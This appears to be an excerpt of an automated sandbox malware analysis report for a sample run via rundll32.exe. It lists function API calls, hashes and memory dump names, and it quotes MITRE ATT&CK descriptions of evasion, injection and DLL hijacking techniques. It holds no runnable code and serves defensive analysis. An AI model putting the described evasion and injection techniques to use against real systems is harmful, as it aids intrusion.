Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023584, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,3F4813DC), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,3F4813DC), ref: 100235D9

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65

Uniqueness

Uniqueness Score: -1.00%

Function 100337CF, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 100337DB

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 100337F2
__amsg_exit.LIBCMT ref: 10033800
__lock.LIBCMT ref: 10033810

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91

Uniqueness

Uniqueness Score: -1.00%

Function 1002173A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
PathFindExtensionA.SHLWAPI(?), ref: 10021778

Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669

Strings

%s%s.dll, xrefs: 10021781

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003785E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499

__getptd.LIBCMT ref: 1003786D

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003787B

Strings

csm, xrefs: 10037889

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10002AB0, Relevance: 5.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,1000308E,00000000,00000000), ref: 10002B05
SetLastError.KERNEL32(0000007E), ref: 10002B47

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
Instruction ID: 796d6741741126c51599b2b906ad2ab7a2c15db3fbae67425d52538266fc70d6
Opcode Fuzzy Hash: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
Instruction Fuzzy Hash: C38182B4A00209DFEB04CF94C981A9EB7B1FF88354F248559E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002A6AB, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID:
API String ID: 3253506028-0
Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002AC8F, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6616 Parent PID: 6532 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	15.8%
Dynamic/Decrypted Code Coverage:	97.6%
Signature Coverage:	0%
Total number of Nodes:	1103
Total number of Limit Nodes:	10

Executed Functions

Function 044352B9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0443537F

Strings

1, xrefs: 04435326
.9h, xrefs: 044352D9
,*FV, xrefs: 044352F7

Memory Dump Source

Source File: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, Offset: 04430000, based on PE: true

Associated: 00000004.00000002.718921076.0000000004430000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.718952043.0000000004456000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4430000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 1$,*FV$.9h
API String ID: 1029625771-1870595533
Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction ID: bd9c6dc28f09827955ba59104c5ad4b195c127b2744ebed2dfc84b8596867cb2
Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction Fuzzy Hash: 2C2156B5D01208FBEF08DFA8D94A9EEBBB5FB40304F108199E915A6251D3B46B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10002D40, Relevance: 6.3, APIs: 4, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.719361068.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.719355411.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 122cb37b0b289274c351768ce399d3c8904b2a50bbd0f0c9b0cc6582413b1c49
Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
Opcode Fuzzy Hash: 122cb37b0b289274c351768ce399d3c8904b2a50bbd0f0c9b0cc6582413b1c49
Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04451538, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(00040652), ref: 04451615

Strings

d , xrefs: 0445158A
Zs, xrefs: 0445154F

Memory Dump Source

Source File: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, Offset: 04430000, based on PE: true

Associated: 00000004.00000002.718921076.0000000004430000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.718952043.0000000004456000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4430000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Zs$d
API String ID: 2591292051-3879001491
Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction ID: 7ed5db266186d219603a0f2cd58ab7abac7631ae2e58e442c0f383cd14d83e75
Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction Fuzzy Hash: C9212CB5D40209EBEB04DFA5D94999DBBB1EB40314F10C099E614B7290D7B96B548F80

Uniqueness

Uniqueness Score: -1.00%

Function 0443D061, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0443D145

Strings

3l}!, xrefs: 0443D0AE
7XJ, xrefs: 0443D0D5

Memory Dump Source

Source File: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, Offset: 04430000, based on PE: true

Associated: 00000004.00000002.718921076.0000000004430000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.718952043.0000000004456000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4430000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3l}!$7XJ
API String ID: 4033686569-2205417827
Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction ID: 2e8fb4d48f8a1a160ce69898b0778833e9189d7c79f59fb789516da504ce36f8
Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction Fuzzy Hash: 012145B5D01318AFDF08DFA5C98A9DEFBB0FF14304F108189E966A6210D7B85B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 044545CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 044546B5

Strings

OM , xrefs: 044545FD

Memory Dump Source

Source File: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, Offset: 04430000, based on PE: true

Associated: 00000004.00000002.718921076.0000000004430000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.718952043.0000000004456000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4430000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: OM
API String ID: 823142352-4198367855
Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction ID: 20e5fbf841862f9081eea3f58a8072e8232faef771136640932c105c3e52d53a
Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction Fuzzy Hash: 8D21EE72801249BBCF05DFA9CD45CDEBFB5EF88304F518199F914A6220D3768A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00004000), ref: 10002704

Memory Dump Source

Source File: 00000004.00000002.719361068.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.719355411.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0444648A, Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 04446543

Memory Dump Source

Source File: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, Offset: 04430000, based on PE: true

Associated: 00000004.00000002.718921076.0000000004430000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.718952043.0000000004456000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4430000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction ID: 8e5e0376e0ac197f0ba7e8759a9cddfc5755c81b8efb7d1912afec05039ef273
Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction Fuzzy Hash: 461100B2C0121DFBEF06DFA5D9098CEBBB4FB04314F108599E921A6250E3B59B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 0444E8B6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 0444E94E

Memory Dump Source

Source File: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, Offset: 04430000, based on PE: true

Associated: 00000004.00000002.718921076.0000000004430000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.718952043.0000000004456000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4430000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction ID: 9df6f9f096ec7d2659fe9e46712a47bdc251d72820d9858809de5868b1a8e0d0
Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction Fuzzy Hash: 8911277190221DFBAB04EFE99D468DFBFB4FF04308F118589E925B2211D3B19B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 0444D11A, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 0444D1B6

Memory Dump Source

Source File: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, Offset: 04430000, based on PE: true

Associated: 00000004.00000002.718921076.0000000004430000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.718952043.0000000004456000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4430000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: bdce6f4fda692cdfd019d382e27b9d192638478cc6a4663006c9ddfc938507c0
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: 841112B1C4030CEBDB44DFE5D94A6DEFBB0EB00709F108588D521B6240D3B89B489F90

Uniqueness

Uniqueness Score: -1.00%

Function 100024D0, Relevance: 1.4, APIs: 1, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 100025CC

Memory Dump Source

Source File: 00000004.00000002.719361068.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.719355411.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d2bbee85c6cabd151e34b26d14f83d277689191624d3873c1df0f1bcce928bde
Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
Opcode Fuzzy Hash: d2bbee85c6cabd151e34b26d14f83d277689191624d3873c1df0f1bcce928bde
Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0445061D, Relevance: 1.3, APIs: 1, Instructions: 52stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 044506E5

Memory Dump Source

Source File: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, Offset: 04430000, based on PE: true

Associated: 00000004.00000002.718921076.0000000004430000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.718952043.0000000004456000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4430000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 69fa2436f3bcb6b17a8b7c60d22d01920450f24ea0d33af42abb5f3872e028e3
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 692110B1C01309ABDF14DFA9D9899DEBFB5FB20354F108298E529A6251D3B49B04CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
